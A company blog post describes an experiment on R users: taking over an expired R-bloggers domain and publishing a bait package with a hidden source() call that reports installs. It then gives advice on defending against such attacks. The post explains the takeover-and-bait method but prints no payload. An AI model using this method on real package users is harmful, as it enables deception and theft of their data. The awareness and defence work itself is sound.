Skip to main content
AI in Production 2026 is now open for talk proposals.
Share insights that help teams build, scale, and maintain stronger AI systems.
items
Menu
  • About
    • Overview 
    • Join Us  
    • Community 
    • Contact 
  • Training
    • Overview 
    • Course Catalogue 
    • Public Courses 
  • Posit
    • Overview 
    • License Resale 
    • Managed Services 
    • Health Check 
  • Data Science
    • Overview 
    • Visualisation & Dashboards 
    • Open-source Data Science 
    • Data Science as a Service 
    • Gallery 
  • Engineering
    • Overview 
    • Cloud Solutions 
    • Enterprise Applications 
  • Our Work
    • Blog 
    • Case Studies 
    • R Package Validation 
    • diffify  

R Packages: Are we too trusting?

Author: Colin Gillespie

Published: February 4, 2019

tags: r, security

One of the great things about R, is the myriad of packages. Packages are typically installed via

  • CRAN
  • Bioconductor
  • GitHub

But how often do we think about what we are installing? Do we pay attention or just install when something looks neat? Do we think about security or just take it that everything is secure? In this post, we conducted a little nefarious experiment to see if people pay attention to what they install.

Do you use Professional Posit Products? If so, check out our managed Posit services

R-bloggers: The hook

R-bloggers is great a resource for keeping on top of what’s happening in the world of R. It’s one the resources we recommend whenever we run training courses. For an author to get their site syndicated to R-bloggers, they have to email Tal who will ensure that the site isn’t spammy. I recently saw a tweet (I can’t remember who from) who suggested tongue in cheek that to boost your website ranking, just grab a site that used to appear on R-bloggers.

This gave me an idea for something a bit more devious! Instead of boosting website traffic, could we grab a domain, create a dummy R package, then monitor who installs this package!

A list of contributing sites is nicely provided by R-bloggers. A quick and dirty script grabs select target domains. First we load a few packages

library(httr)
library(tidyverse)
library(rvest)

Then extract all URLs from the page

page_source = "https://www.r-bloggers.com/blogs-list/"  %>%
  read_html()
urls = html_attr(html_nodes(page_source, "a"), "href")

With a little helper function to get the status code

# If a site is available, it should return 200
get_status_code = function(url) {
  status = try(GET(url)$status, silent = TRUE)
  if (class(status) == "try-error")
    status = NA
  status
}

we simply probe each URL

# Lots of threads
status_codes = parallel::mclapply(urls, get_code, mc.cores = 24)
status_codes = unlist(status_codes)

In total, there were 43 URLs not returning the required status code of 200

tibble(urls = urls, status_codes = status_codes) %>%
   filter(!is.na(status_codes)) %>%
   filter(status_codes != 200) %>%
   head()
# A tibble: 6 x 2
  urls                                                     status_codes
  <chr>                                                           <int>
1 http://www.56n.dk                                                 406
2 http://bio7.org/                                                  403
3 http://www.seascapemodels.org/bluecology_blog/index.html          404
4 https://climateecology.wordpress.com                              410
5 http://www.compmath.com/blog                                      500
6 https://hamiltonblake.github.io                                   404

In the end, we went with vinux.in. Using the Wayback machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.

By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy is simply to set back and get traffic from R-bloggers.

{blogdown} & {ggplot2}: the bait

Next, I created a GitLab user rstatsgit and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package the scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used netlify to link our new blog to our recently purchased domain. The resulting blog doesn’t look too bad at all.

At the bottom of one of the .R files in the package, there is a simple source() command. This, in theory, could be used to do anything - grab data, passwords, ssh keys. Clearly, we don’t do any of this. Instead, it simply pings a site to tell us if the package has been installed.

R-bloggers & twitter: Delivery

To deliver the content, I’m going for a combination of trying to get it onto r-bloggers via the old RSS feed and tweeting about the page with the #rstats tag.

Did people install the package

I’ll update the blog post with results in a week or two.

Who is not to blame

It’s instructive to think about who is not to blame:

  • Gitlab/GitHub: it would be impossible for them to police who code that is uploaded to their site.
  • {devtools}(install_git*()): They’re many legitimate uses for this function. Blaming it would be the equivalent to blaming StackOverflow for bad advice. It doesn’t really make sense.
  • R-bloggers: It simply isn’t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control
  • The person who owned the site: Nope. They owned the site. Now they don’t. They have no responsibility.

Who is to blame?

Well, I suppose I’m to blame since I created the site and package ;) But more seriously if you installed the package, you’re to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, forums and not always understanding what’s going on. But the internet is a dangerous place, and most people who us R, almost certainly have juicy data that shouldn’t be released to the outside world.

By pure coincidence, I’ve noticed that Bob Rudis has started emphasising that we should be more responsible about what we install.

How to protect against this?

This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.

The crucial thing to remember is that if someone really wants to do something unsafe, we can’t stop them. Instead, we need to provide safe alternatives that don’t hinder work while at the same time reduce overall risk.

When dealing with companies we help them tackle the problem in a number of ways

  • Education! Both of the team and team leaders!
  • Have an internal package repository. Either we build this, or use RStudio’s package manager we’re one of the few RStudio Certified partners in the world).
  • We may disable tools such as install_github()
  • Reduce risk by having clear testing and deployment machines
  • Implement two-factor authentication

All of the above can be circumvented by a data scientist. But the idea is with education, we can reduce the potential risk while not impeding day to day work.


Jumping Rivers Logo

Recent Posts

  • Start 2026 Ahead of the Curve: Boost Your Career with Jumping Rivers Training 
  • Should I Use Figma Design for Dashboard Prototyping? 
  • Announcing AI in Production 2026: A New Conference for AI and ML Practitioners 
  • Elevate Your Skills and Boost Your Career – Free Jumping Rivers Webinar on 20th November! 
  • Get Involved in the Data Science Community at our Free Meetups 
  • Polars and Pandas - Working with the Data-Frame 
  • Highlights from Shiny in Production (2025) 
  • Elevate Your Data Skills with Jumping Rivers Training 
  • Creating a Python Package with Poetry for Beginners Part2 
  • What's new for Python in 2025? 

Top Tags

  • R (236) 
  • Rbloggers (182) 
  • Pybloggers (89) 
  • Python (89) 
  • Shiny (63) 
  • Events (26) 
  • Training (23) 
  • Machine Learning (22) 
  • Conferences (20) 
  • Tidyverse (17) 
  • Statistics (14) 
  • Packages (13) 

Authors

  • Amieroh Abrahams 
  • Aida Gjoka 
  • Osheen MacOscar 
  • Keith Newman 
  • Tim Brock 
  • Shane Halloran 
  • Russ Hyde 
  • Myles Mitchell 
  • Theo Roe 
  • Colin Gillespie 
  • Gigi Kenneth 
  • Sebastian Mellor 
  • Pedro Silva 

Keep Updated

Like data science? R? Python? Stan? Then you’ll love the Jumping Rivers newsletter. The perks of being part of the Jumping Rivers family are:

  • Be the first to know about our latest courses and conferences.
  • Get discounts on the latest courses.
  • Read news on the latest techniques with the Jumping Rivers blog.

We keep your data secure and will never share your details. By subscribing, you agree to our privacy policy.

Follow Us

  • GitHub
  • Bluesky
  • LinkedIn
  • YouTube
  • Eventbrite

Find Us

The Catalyst Newcastle Helix Newcastle, NE4 5TG
Get directions

Contact Us

  • hello@jumpingrivers.com
  • + 44(0) 191 432 4340

Newsletter

Sign up

Events

  • North East Data Scientists Meetup
  • Leeds Data Science Meetup
  • Shiny in Production
British Assessment Bureau, UKAS Certified logo for ISO 9001 - Quality management British Assessment Bureau, UKAS Certified logo for ISO 27001 - Information security management Cyber Essentials Certified Plus badge
  • Privacy Notice
  • |
  • Booking Terms

©2016 - present. Jumping Rivers Ltd